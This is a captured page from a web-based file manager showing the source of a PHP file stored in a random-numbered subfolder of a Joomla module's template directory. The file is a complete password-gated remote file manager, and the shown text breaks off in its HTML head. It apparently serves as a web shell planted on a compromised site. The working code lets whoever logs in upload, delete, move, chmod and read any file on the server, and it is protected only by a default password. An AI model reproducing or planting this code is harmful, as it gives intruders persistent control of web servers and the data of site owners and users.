芝麻web文件管理V1.00

编辑当前文件:/home2/sdektunc/testcors.sdektun.com/modules/mod_articles_latest/tmpl/333739/index.php

<?php
//23568
	session_start();
	
	/*Recursive copy -- Courtesy of Felix King and Mooseman on Stack Overflow*/ function recursive_copy($src,$dst) { if($dir = opendir($src)) { if(mkdir($dst)) { while(false !== ( $file = readdir($dir)) ) { if (( $file != '.' ) && ( $file != '..' )) { if ( is_dir($src . '/' . $file) ) { recursive_copy($src . '/' . $file,$dst . '/' . $file); } else { copy($src . '/' . $file,$dst . '/' . $file); } } } } else { return false; } } else { return false; } closedir($dir); return true; }  
	/*Recursive delete -- Courtesy of itay at itgoldman dot com on php.net*/ function recursive_delete($src) { $dir = opendir($src); while(false !== ( $file = readdir($dir)) ) { if(($file != '.') && ($file != '..')) { $full = $src . '/' . $file; if(is_dir($full)) { recursive_delete($full); } else { unlink($full); } } } closedir($dir); if(rmdir($src)) { return true; } else { return false; } }
	/*Multisort -- courtesy of RWC on php.net*/ function multi_sort($array, $akey, $order) { function compare($a, $b) { global $key; return strcmp($a[$key], $b[$key]); } usort($array, "compare"); if($order == -1) { $array = array_reverse($array); } return $array; }
	/*Human Filesize -- Courtesy of rommel at rommelsantor dot com on php.net*/ function human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = floor((strlen($bytes) - 1) / 3); return array(sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)), @$sz[$factor],$bytes); }
	/*returnStatus -- Courtesy of... me. */ function returnStatus($desc,$level) { die(json_encode(["desc"=>$desc,"level"=>$level])); }
	/*fileFilter -- Courtesy of Sean Vieira on Stack Overflow*/ function fileFilter($file) { return mb_ereg_replace("([^\w\s\d\-_~,;\[\].])", '', $file); }
	
	//Establish where we are
	$currentDirectory = getcwd();
	if(isset($_POST['directory']) && $_POST['directory'] != "") { $currentDirectory .= str_replace("..", "", $_POST['directory']); }
	
	/* AJAX responses begin here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
	** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
	if(isset($_POST['apiCall']) && isset($_SESSION['loggedIn']) && $_SESSION['loggedIn'] === True) {
		
		
		/* File list begins here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
			if(isset($_POST['ls'])) {
		
				//Get all files in the current directory
				$fileList = glob($currentDirectory . "/*");
				$fileDetails = [];
				
				//Iterate through that list
				for($v = 0; $v < sizeof($fileList); $v++) {
				
					//Name
					$fileDetails[$v]["name"] = str_replace($currentDirectory . "/", "", $fileList[$v]);
					//Directory?
					$fileDetails[$v]["isDir"] = is_dir($fileList[$v]);
					//In directory -- DELETEME
					//$fileDetails[$v]["currentDir"] = $currentDirectory;
					
					//Get file size
					$fileDetails[$v]["fileSize"] = ($fileDetails[$v]["isDir"] ? array("","","0") : human_filesize(filesize($fileList[$v]),2));
		
					//Permissions
					$fileDetails[$v]["permissions"] = substr(sprintf("%o",fileperms($fileList[$v])),-3);;
					
					//Modified
					$fileDetails[$v]["dateModified"] = filemtime($fileList[$v]);
				}
				
				//Sort the array as per the user's filter request
				$sort = explode(",",$_POST['sortBy']);
				$fileDetails = multi_sort($fileDetails,$key=$sort[0],$sort[1]);
				
				//Echo the file info
				die(json_encode($fileDetails));
			}
		/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** File list ends here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
		
		
		/* File previews begin here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
			else if(isset($_POST['previewFile'])) {
				
				$fileName = $currentDirectory . "/" . fileFilter($_POST['fileName']);
				if(file_exists($fileName)) {
					die(json_encode(htmlspecialchars(file_get_contents($fileName))));
				} else { returnStatus("Couldn't find file.","fatal"); }
			}
		
		/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** File previews ends here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
	
		
		/* Create file or directory begins here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
			else if(isset($_POST['makeFile'])) {
				
				$file = $_POST['fileName'];
				$destination = $currentDirectory . "/" . fileFilter($_POST['fileName']);
				
				if(!file_exists($destination)) {
					if($_POST['fod'] == "file") {
						if($f = @fopen($destination, "w")) {
							chmod($destination,0775);
							returnStatus("Successfuly created file '" . $file . "'.","success");
						} else { returnStatus("Couldn't open stream. Permission denied?","fatal"); }
					} else if($_POST['fod'] == "dir") {
						if($f = @mkdir($destination,0775,true)) { 
							returnStatus("Successfuly created directory '" . $file . "'.","success");
						} else { returnStatus("Failed to create directory. Permission denied?","fatal"); }
					}
				} else { returnStatus("File already exists.","fatal"); }
			} 
		/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** Create file or directory ends here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
		
		
		/* Delete file or directory begins here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
			else if(isset($_POST['deleteFile'])) {
				
				$fileName = $currentDirectory . "/" . fileFilter($_POST['fileName']);
				
				if(file_exists($fileName)) {
					
					if(!is_dir($fileName)) { 
						if(unlink($fileName)) {
							returnStatus("Deleted " . $fileName . ".","success");
						} else { returnStatus("Couldn't delete " . $fileName . ".","fatal"); }
					} else {
						if(recursive_delete($fileName)) {
							returnStatus("Deleted " . $fileName . ".","success");
						} else { returnStatus("Couldn't delete " . $fileName . ".","fatal"); }
					}
				} else {
					returnStatus("Couldn't find file '" . $fileName . "'.","fatal");
				}
			}
		/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** Delete file or directory ends here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
		
		
		/* Copy file or directory begins here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
			else if(isset($_POST['copy'])) {
				$fileName = $currentDirectory . "/" . fileFilter($_POST['fileName']);
				$copyName = $currentDirectory . "/" . fileFilter($_POST['copyName']);
				
				if(file_exists($fileName)) {
					if(!file_exists($copyName)) {
						if(!is_dir($fileName)) { 
							if(copy($fileName, $copyName)) {
								returnStatus("Successfuly copied file.","success");
							} else { returnStatus("Copy failed.","fatal"); }
						} 
						else {
							if(recursive_copy($fileName,$copyName)) { returnStatus("Successfuly copied folder.","success"); }
							else { returnStatus("Failed to copy folder.","fatal"); }
						}
					} else { returnStatus($_POST['copyName'] . " already exists.","fatal"); }
				}
				else {
					returnStatus("Couldn't find file '" . explode("/",$fileName)[substr_count($fileName,"/")] . "'.","fatal");
				}
			}
		/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** Copy file or directory ends here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
		
		
		/* Move file or directory begins here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
			else if(isset($_POST['move'])) {
			
				$fileName = $currentDirectory . "/" . fileFilter($_POST['fileName']);
				$newFile = $currentDirectory . "/" . str_replace("..", "", $_POST['newDir']) . "/" . fileFilter($_POST['fileName']);
				
				//TODO: Make this better.
				if(file_exists($fileName)) {
					if(!file_exists($newFile)) {
						
						//Supress error here so we can show our own.
						if(@rename($fileName,$newFile)) { returnStatus("Moved file.","success"); }
					else { returnStatus("Couldn't move file. Do you have permissions?","fatal"); }
						
					} else { returnStatus($_POST['fileName'] . " already exists.","fatal"); }
				}
				else {
					returnStatus("Couldn't find file '" . explode("/",$fileName)[substr_count($fileName,"/")] . "'.","fatal");
				}
			}
		/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** Move file or directory ends here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
	
	
		/* Rename file or directory begins here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
			else if(isset($_POST['rename'])) {
				
				$fileName = $currentDirectory . "/" . fileFilter($_POST['fileName']);
				$copyName = $currentDirectory . "/" . fileFilter($_POST['copyName']);
				
				if(file_exists($fileName)) {
					if(!file_exists($copyName)) {
						if(rename($fileName,$copyName)) { returnStatus("Successfuly renamed file.","success"); }
					} else { returnStatus($_POST['copyName'] . " already exists.","fatal"); }
				}
				else { returnStatus("Couldn't find file '" . explode("/",$fileName)[substr_count($fileName,"/")] . "'.","fatal"); }
			}
		/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** Rename file or directory ends here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
		
		
		/* Permission changes begins here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
			else if(isset($_POST['changePermissions'])) {
				
				$fileName = $currentDirectory . "/" . fileFilter($_POST['fileName']);
				$newPermissions = $_POST['newPermissions'];
				$npl = strlen($newPermissions);
				
				//CHMOD numbers must be octals in PHP
				if($npl == 3) { $newPermissions = "0" . $newPermissions; $npl++; }
				
				if($npl == 4) {
					if(file_exists($fileName)) {
						if(chmod($fileName,octdec($newPermissions))) {
							returnStatus("Successfuly changed permissions of $fileName to $newPermissions.","success");
						} else { returnStatus("Permission change failed.","fatal"); }
					} else { returnStatus("Couldn't find file '" . explode("/",$fileName)[substr_count($fileName,"/")] . "'.","fatal"); }
				} else { returnStatus("Permission value was not correctly formatted.","fatal"); }
			}
		/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** Permission changes ends here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
		
		
		/* File upload begins here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
			else if(isset($_POST['fileUpload'])) {
				
				$finalName = $currentDirectory . "/" . fileFilter(basename($_FILES["fileToUpload"]["name"]));
				
				if(!file_exists($finalName)) {
					if(move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $finalName)) {
						chmod($finalName,0755);
						returnStatus("Uploaded file.","success");
						
					} else { returnStatus("Couldn't upload file.","fatal"); }
				} else { returnStatus("File already exists.","fatal"); }
			}
		/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
		** File upload ends here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
		
		
		//If an apiCall is specified but we reach here, no command was actually specified. 
		die(returnStatus("No command was issued.","fatal"));
	
	}
	/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
	** AJAX responses ends here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
	
	
	/* Login form begins here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
	** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
	
		//THIS IS NOT VERY SECURE! USE AT YOUR OWN RISK!
	
		// *** Generate a password with this function and replace $password with the result: ***
		/*die(password_hash("your password here",PASSWORD_BCRYPT));*/
		
		//Default password is 'alpine'. CHANGE THIS BEFORE YOU USE THE EDITOR!
		$password = '$2y$10$NpfqQZ3/i/ExRTsVyaHIRuE7TtKAchPi2gvz4LRnpiaBtJczy.WM2';
		
		//If we've come here from the form
		if(isset($_POST['login'])) { 
		
			//Verify password
			if(password_verify($_POST['password'],$password)) { $_SESSION['loggedIn'] = true; } 
			else { echo "Incorrect password."; }
		}
		
		//If the session didn't get set above, show the login form.
		if(!isset($_SESSION['loggedIn']) || !$_SESSION['loggedIn']) {
			
			die("
				<form action = '?' method = 'POST'>
					<label>Password: <input type = 'password' name = 'password'></label>
					<input type = 'submit' name = 'login' value = 'Login'>
				</form>
			");
			
		}
	/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
	** Login form ends here    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
?>

<html>
	<head>
		<title>toitFM</title>
		
		<meta charset = 'UTF-8'>
		<meta name="viewport" content="width=device-width, initial-scale=1"
		
		
		<script src="https://code.jquery.com/jquery-3.1.1.min.js" integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8=" crossorigin="anonymous"></script>
		<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css" integrity="sha384-mzrmE5qonljUremFsqc01SB46JvROS7bZs3IO2EmfFsd15uHvIt+Y8vEf7N7fWAU" crossorigin="anonymous">
		
		<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
		<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
		<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.bundle.min.js" integrity="sha384-pjaaA8dDz/5BgdFUPX6M/9SUZv4d12SUPF0axWc+VRZkx5xU3daN+lYb49+Ax+Tl" crossorigin="anonymous"></script>
		
		
		<script> function postAjax(url, data, success) {var params = typeof data == 'string' ? data : Object.keys(data).map(function(k){return encodeURIComponent(k) + '=' + encodeURIComponent(data[k])}).join('&');var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");xhr.open('POST', url);xhr.onreadystatechange = function() {if(xhr.readyState>3 && xhr.status==200) { success(xhr.responseText); }};xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');xhr.send(params);return xhr;} </script>
		
		<script> function bid(el) { let first = el[0]; el = el.substring(1); if(first == "#") { return document.getElementById(el); } if(first == ".") { return document.getElementsByClassName(el); } } </script>